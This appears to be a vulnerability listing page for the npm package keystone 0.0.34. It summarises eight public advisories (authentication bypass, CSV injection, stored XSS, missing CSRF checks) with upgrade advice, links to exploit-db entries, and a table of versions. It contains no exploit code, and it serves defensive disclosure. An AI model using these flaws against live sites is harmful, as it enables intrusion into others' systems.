NodeJS/keystone/0.0.34
Web Application Framework and Admin GUI / Content Management System built on Express.js and Mongoose
https://www.npmjs.com/package/keystone
MIT
8 Security Vulnerabilities
Authentication Weakness in keystone
Versions of keystone
prior to 0.3.16 are affected by a partial authentication bypass vulnerability. In the default sign in functionality, if an attacker provides a full and correct password, yet only provides part of the associated email address, authentication will be granted.
Recommendation
Update to version 0.3.16 or later.
Keystone is vulnerable to CSV injection
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
Cross-Site Scripting in keystone
- https://nvd.nist.gov/vuln/detail/CVE-2017-15881
- https://github.com/advisories/GHSA-7cv6-gvx3-m54m
- https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
- https://www.npmjs.com/advisories/981
- https://github.com/keystonejs/keystone/issues/4437
- https://github.com/keystonejs/keystone/pull/4478
- http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/
- http://www.securityfocus.com/bid/101541
Versions of keystone
prior to 4.0.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly encode rendered HTML on admin-created blog posts. This allows attackers to execute arbitrary JavaScript in the victim's browser. Exploiting this vulnerability requires having access to an admin account.
Recommendation
Update to version 4.0.0 or later.
Cross-Site Scripting in keystone
- https://nvd.nist.gov/vuln/detail/CVE-2017-15878
- https://github.com/advisories/GHSA-7qcx-jmrc-h2rr
- https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
- https://www.npmjs.com/advisories/980
- https://github.com/keystonejs/keystone/pull/4478
- https://packetstormsecurity.com/files/144756/KeystoneJS-4.0.0-beta.5-Unauthenticated-Stored-Cross-Site-Scripting.html
- https://www.exploit-db.com/exploits/43054/
- http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/
- http://www.securityfocus.com/bid/101541
Versions of keystone
prior to 4.0.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize user input on the Contact Us
page, allowing attackers to submit contact forms with malicious JavaScript in the message field. The output is not properly encoded leading an admin that opens new inquiry to execute the arbitrary JavaScript supplied in their browser.
Recommendation
Update to version 4.0.0 or later.
Authentication Weakness in keystone
There is an authentication weakness vulnerability in keystone before version 0.3.16. Due to a bug in the the default sign in functionality, incomplete email addresses could be matched. A correct password is still required to complete sign in.
Cross-Site Scripting in keystone
Withdrawn: Duplicate of GHSA-7qcx-jmrc-h2rr
Cross-Site Request Forgery (CSRF) in keystone
- https://nvd.nist.gov/vuln/detail/CVE-2017-16570
- https://github.com/advisories/GHSA-q43c-g2g7-6gxj
- https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
- https://snyk.io/vuln/SNYK-JS-KEYSTONE-449663
- https://www.npmjs.com/advisories/979
- https://github.com/keystonejs/keystone/issues/4437
- https://github.com/keystonejs/keystone/pull/4478
- https://www.exploit-db.com/exploits/43922/
- http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/
Versions of keystone
prior to 4.0.0 are vulnerable to Cross-Site Request Forgery (CSRF). The package fails to validate the presence of the X-CSRF-Token
header, which may allow attackers to carry actions on behalf of other users on all endpoints.
Recommendation
Update to version 4.0.0 or later.
Authentication Weakness
Due to a bug in the the default sign in functionality, incomplete email addresses could be matched. A correct password is still required to complete sign in.
171 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
4.2.1 | MIT | 2019-07-15 - 12:56 | almost 5 years | |
4.2.0 | MIT | 2019-07-15 - 12:49 | almost 5 years | |
4.1.1 | MIT | 2019-06-23 - 12:57 | about 5 years | |
4.1.0 | MIT | 2019-05-19 - 15:54 | about 5 years | |
4.0.0 | MIT | 2018-07-25 - 08:31 | almost 6 years | |
4.0.0-rc.1 | MIT | 2 | 2018-07-06 - 07:57 | almost 6 years |
4.0.0-rc.0 | MIT | 2 | 2018-06-22 - 09:31 | about 6 years |
4.0.0-beta.8 | MIT | 2 | 2018-01-22 - 13:00 | over 6 years |
4.0.0-beta.7 | MIT | 2 | 2017-10-23 - 06:45 | over 6 years |
4.0.0-beta.5 | MIT | 5 | 2017-01-25 - 06:08 | over 7 years |
4.0.0-beta.4 | MIT | 5 | 2016-12-02 - 02:11 | over 7 years |
4.0.0-beta.3 | MIT | 5 | 2016-09-25 - 10:56 | almost 8 years |
4.0.0-beta.2 | MIT | 5 | 2016-09-06 - 02:25 | almost 8 years |
4.0.0-beta.1 | MIT | 5 | 2016-08-25 - 07:54 | almost 8 years |
0.3.22 | MIT | 5 | 2016-07-22 - 10:36 | almost 8 years |
0.3.21 | MIT | 5 | 2016-06-19 - 11:44 | about 8 years |
0.3.20 | MIT | 5 | 2016-06-17 - 11:45 | about 8 years |
0.3.19 | MIT | 5 | 2016-05-04 - 15:09 | about 8 years |
0.3.18 | MIT | 5 | 2016-04-27 - 06:59 | about 8 years |
0.3.17 | MIT | 5 | 2016-03-23 - 09:04 | over 8 years |
0.3.16 | MIT | 5 | 2015-12-04 - 02:49 | over 8 years |
0.3.15 | MIT | 8 | 2015-10-15 - 00:28 | over 8 years |
0.3.14 | MIT | 8 | 2015-08-25 - 04:48 | almost 9 years |
0.3.13 | MIT | 8 | 2015-08-03 - 11:36 | almost 9 years |
0.3.12 | MIT | 8 | 2015-06-25 - 14:16 | about 9 years |
0.3.11 | MIT | 8 | 2015-06-12 - 06:16 | about 9 years |
0.3.10 | MIT | 8 | 2015-05-19 - 13:55 | about 9 years |
0.3.9 | MIT | 8 | 2015-05-16 - 14:25 | about 9 years |
0.3.8 | MIT | 8 | 2015-04-23 - 13:36 | about 9 years |
0.3.7 | MIT | 8 | 2015-04-23 - 09:44 | about 9 years |
0.3.6 | MIT | 8 | 2015-04-14 - 00:18 | about 9 years |
0.3.5 | MIT | 8 | 2015-04-12 - 10:52 | about 9 years |
0.3.4 | MIT | 8 | 2015-03-10 - 12:07 | over 9 years |
0.3.3 | MIT | 8 | 2015-03-08 - 12:17 | over 9 years |
0.3.2 | MIT | 8 | 2015-02-27 - 11:22 | over 9 years |
0.3.1 | MIT | 8 | 2015-02-13 - 11:37 | over 9 years |
0.3.0 | MIT | 8 | 2015-02-10 - 10:49 | over 9 years |
0.2.42 | MIT | 8 | 2015-01-20 - 03:47 | over 9 years |
0.2.41 | MIT | 8 | 2015-01-18 - 11:48 | over 9 years |
0.2.40 | MIT | 8 | 2014-12-31 - 04:26 | over 9 years |
0.2.39 | MIT | 8 | 2014-12-20 - 07:57 | over 9 years |
0.2.38 | MIT | 8 | 2014-12-19 - 07:52 | over 9 years |
0.2.37 | MIT | 8 | 2014-12-19 - 00:54 | over 9 years |
0.2.36 | MIT | 8 | 2014-12-07 - 04:51 | over 9 years |
0.2.35 | MIT | 8 | 2014-12-03 - 07:00 | over 9 years |
0.2.34 | MIT | 8 | 2014-11-29 - 10:14 | over 9 years |
0.2.33 | MIT | 8 | 2014-11-04 - 14:36 | over 9 years |
0.2.32 | MIT | 8 | 2014-10-16 - 11:08 | over 9 years |
0.2.31 | MIT | 8 | 2014-10-14 - 12:50 | over 9 years |
0.2.30 | MIT | 8 | 2014-10-02 - 12:17 | over 9 years |
0.2.29 | MIT | 8 | 2014-09-30 - 13:54 | almost 10 years |
0.2.28 | MIT | 8 | 2014-09-12 - 11:42 | almost 10 years |
0.2.27 | MIT | 8 | 2014-08-30 - 11:43 | almost 10 years |
0.2.26 | MIT | 8 | 2014-08-14 - 04:03 | almost 10 years |
0.2.25 | MIT | 8 | 2014-07-27 - 13:09 | almost 10 years |
0.2.24 | MIT | 8 | 2014-07-25 - 07:10 | almost 10 years |
0.2.23 | MIT | 8 | 2014-07-20 - 11:06 | almost 10 years |
0.2.22 | MIT | 8 | 2014-06-28 - 17:17 | about 10 years |
0.2.21 | MIT | 8 | 2014-06-16 - 03:57 | about 10 years |
0.2.20 | MIT | 8 | 2014-06-06 - 11:00 | about 10 years |
0.2.19 | MIT | 8 | 2014-05-28 - 08:19 | about 10 years |
0.2.18 | MIT | 8 | 2014-05-21 - 15:05 | about 10 years |
0.2.17 | MIT | 8 | 2014-05-19 - 02:19 | about 10 years |
0.2.16 | MIT | 8 | 2014-05-14 - 11:20 | about 10 years |
0.2.15 | MIT | 8 | 2014-05-13 - 06:13 | about 10 years |
0.2.14 | MIT | 8 | 2014-04-15 - 16:40 | about 10 years |
0.2.13 | MIT | 8 | 2014-04-03 - 14:31 | about 10 years |
0.2.12 | MIT | 8 | 2014-04-02 - 15:25 | over 10 years |
0.2.11 | MIT | 8 | 2014-04-02 - 11:30 | over 10 years |
0.2.10 | MIT | 8 | 2014-03-18 - 15:46 | over 10 years |
0.2.9 | MIT | 8 | 2014-03-18 - 12:42 | over 10 years |
0.2.8 | MIT | 8 | 2014-03-12 - 16:05 | over 10 years |
0.2.7 | MIT | 8 | 2014-03-11 - 08:31 | over 10 years |
0.2.6 | MIT | 8 | 2014-02-25 - 06:08 | over 10 years |
0.2.5 | MIT | 8 | 2014-02-17 - 15:56 | over 10 years |
0.2.4 | MIT | 8 | 2014-02-15 - 16:35 | over 10 years |
0.2.3 | MIT | 8 | 2014-02-10 - 15:10 | over 10 years |
0.2.2 | MIT | 8 | 2014-02-05 - 09:48 | over 10 years |
0.2.1 | MIT | 8 | 2014-02-04 - 06:16 | over 10 years |
0.2.0 | MIT | 8 | 2014-01-25 - 16:18 | over 10 years |
0.1.55 | MIT | 8 | 2013-12-30 - 03:45 | over 10 years |
0.1.54 | MIT | 8 | 2013-12-23 - 08:50 | over 10 years |
0.1.53 | MIT | 8 | 2013-12-22 - 14:29 | over 10 years |
0.1.52 | MIT | 8 | 2013-12-12 - 08:29 | over 10 years |
0.1.51 | MIT | 8 | 2013-12-10 - 17:08 | over 10 years |
0.1.50 | MIT | 8 | 2013-12-09 - 07:24 | over 10 years |
0.1.49 | MIT | 8 | 2013-12-04 - 06:52 | over 10 years |
0.1.48 | MIT | 8 | 2013-12-03 - 06:21 | over 10 years |
0.1.47 | MIT | 8 | 2013-12-02 - 06:55 | over 10 years |
0.1.46 | MIT | 8 | 2013-11-27 - 08:38 | over 10 years |
0.1.45 | MIT | 8 | 2013-11-20 - 14:51 | over 10 years |
0.1.44 | MIT | 8 | 2013-11-19 - 15:50 | over 10 years |
0.1.43 | MIT | 8 | 2013-11-19 - 14:27 | over 10 years |
0.1.42 | MIT | 8 | 2013-11-18 - 15:49 | over 10 years |
0.1.41 | MIT | 8 | 2013-11-18 - 10:56 | over 10 years |
0.1.40 | MIT | 8 | 2013-11-14 - 09:00 | over 10 years |
0.1.39 | MIT | 8 | 2013-11-06 - 13:45 | over 10 years |
0.1.38 | MIT | 8 | 2013-11-05 - 15:44 | over 10 years |
0.1.37 | MIT | 8 | 2013-11-04 - 06:59 | over 10 years |
0.1.36 | MIT | 8 | 2013-11-02 - 14:57 | over 10 years |